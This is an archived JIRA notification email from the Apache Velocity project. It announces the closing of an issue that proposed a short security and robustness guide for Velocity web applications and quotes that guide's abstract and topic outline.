[jira] Closed: (VELOCITY-184) new document: "Building a Robust and Secure Web Application With Velocity"

Wed, 07 Mar 2007 16:20:11 -0800 

     [ 
https://issues.apache.org/jira/browse/VELOCITY-184?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Henning Schmiedehausen closed VELOCITY-184.
-------------------------------------------


> new document: "Building a Robust and Secure Web Application With Velocity"
> --------------------------------------------------------------------------
>
>                 Key: VELOCITY-184
>                 URL: https://issues.apache.org/jira/browse/VELOCITY-184
>             Project: Velocity
>          Issue Type: Bug
>          Components: Documentation
>    Affects Versions: 1.0-Release
>         Environment: Operating System: other
> Platform: Other
>            Reporter: Will Glass-Husain
>         Assigned To: Velocity-Dev List
>         Attachments: security.xml
>
>
> Any time you build a web application, it your responsibility as a web 
> developer to ensure that the application does what it is supposed to do, 
> fails 
> gracefully in case of an error, keeps users from gaining access to data they 
> are not supposed to view, and prevents malicious users from interfering with 
> the operation of the application. 
> While a detailed discussion of how to build a robust web application is an 
> overly complex topic, this short paper touches on several issues that are 
> common in a Velocity-based web application. The paper is written from the 
> perspective of a Velocity developer, who interacts with a group of HTML 
> template designers and a larger pool of end users. 
> Topics
> 1) How Velocity Helps the Developer Create a Robust App 
> 2) Velocity-Specific Issues Regarding Robustness and Security 
> 3) Best Practices In Building A Secure, Robust Velocity Web Application 
>    a) Review all context references for unwanted methods. 
>    b) Encode HTML special characters to avoid cross-scripting 
> vulnerabilities. 
>    c) Use an up-to-date and properly configured app server. 
>    d) Configure Velocity for production use. 
> 4) Working with Untrusted HTML Template Designers

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.


---------------------------------------------------------------------
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Reply via email to